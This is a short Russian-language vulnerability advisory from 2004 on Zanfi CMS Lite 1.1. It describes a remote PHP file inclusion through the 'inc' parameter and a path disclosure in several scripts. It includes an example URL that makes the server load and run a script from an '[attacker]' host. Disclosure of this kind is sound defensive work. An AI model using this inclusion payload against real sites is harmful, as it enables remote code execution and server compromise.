Security Lab

Выполнение произвольных php команд в Zanfi CMS Lite

Дата публикации:14.10.2004
Всего просмотров:1798
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: Zanfi CMS Lite 1.1

Описание:
Обнаружено несколько уязвимостей в Zanfi CMS Lite. Удаленный атакующий может выполнить произвольный php сценарий и системные команды на уязвимой системе и получить данные об установочной директории сервера.

Удаленный атакующий может указать в качестве параметра переменной ‘inc’ путь к удаленному php сценарию, который будет выполнен на уязвимой системе. Пример:

http://[target]/index.php?inc=http://[attacker]

Удаленный атакующий может напрямую обратиться к нескольким сценариям и поучить данные об установочной директории. Пример:

http://[target]/cms/adm_pages.php

Уязвимые сценарии: 'corr_pages.php', 'del_block.php', 'del_page.php', 'footer.php', и 'home.php'.

URL производителя: www.zanfi.nl/cms/index.php

Решение: Решение на данный момент не существует.

Ссылки: php Including in Zanfi CMS Lite